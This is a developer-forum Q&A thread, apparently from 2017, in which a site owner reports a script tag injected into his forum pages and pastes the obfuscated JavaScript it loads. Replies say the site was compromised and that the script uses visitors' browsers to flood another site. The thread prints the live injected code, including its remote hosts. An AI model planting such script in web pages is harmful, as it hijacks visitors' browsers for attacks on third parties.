开发者社区> 问答> 正文

我中招了?

发现我网站的有一些页面加上了这一段代码,在<head>里
<script charset="utf-8" async="true" src="http://t.5txs.cn/rb/i9.js"></script>


打开这段代码,发现是这样的:
(function(d){function $a(p){try{var x=d.getElementsByTagName("head")[0];var y=x.appendChild($s(p));setTimeout(function(){x.removeChild(y)},2000)}catch(e){}}function $c(n){return d.createElement(n)}function $s(p){var j=$c("script");j.src=p;j.async=true;j.type="text/javascript";return j}var amt=0;function $rn(){var ww=d.body.clientWidth;var hh=d.body.clientHeight;var u={j:"ht",c:"com.cn",q:"tp:",m:"b.",n:"wdzs",d:"a."};var be=u.j+u.q+"//"+u.d+u.n+u.m+u.c;var en=escape(window.location.href)+"&a="+Math.random()+"&w="+ww+"&h="+hh;if(top==this){if(ww>300&&hh>40){$a(be+"/fmt9/?u="+en)}}}setTimeout($rn,1000)})(document);




查找这个域名5txs.cn,发现是一个个人注册的。
我中招了?这段代码是干嘛的啊?

展开
收起
张看 2017-04-05 16:37:52 3524 0
5 条回答
写回答
取消 提交回答
  • 嘀嘀嘀达人
    Re我中招了?
    a.wdzsb.com.cn
    2017-04-14 16:09:48
    赞同 展开评论 打赏
  • 论坛总版主
    回 4楼(张看) 的帖子
    你几个网站啊?

    -------------------------

    回 7楼(张看) 的帖子
    DZ是吗?这个我处理好几个了
    2017-04-05 19:03:48
    赞同 展开评论 打赏
  •    看来是中招了
    2017-04-05 17:35:40
    赞同 展开评论 打赏
  • 回 1楼(诸神之怒) 的帖子
    那段代码是什么意思,翻译给我听听看

    -------------------------

    回 3楼(诸神之怒) 的帖子
    被攻击的目标网站是哪个网站?

    -------------------------

    回 6楼(梦丫头) 的帖子
    我一个网站啊。分主站和论坛,中招的是论坛。
    梦丫头有什么要说的么?
    2017-04-05 16:46:11
    赞同 展开评论 打赏
  • Re我中招了?
    呵呵,是的

    -------------------------

    回 2楼张看的帖子
    客户端调用这个代码后会发起对目标网站cc攻击,每秒攻击一次,大概是这个意思
    2017-04-05 16:45:13
    赞同 展开评论 打赏
问答分类:
问答地址:
问答排行榜
最热
最新

相关电子书

更多
打击网络黑产浅见分享 立即下载
代码未写,漏洞已出 立即下载
手机取证的新问题和新发展 立即下载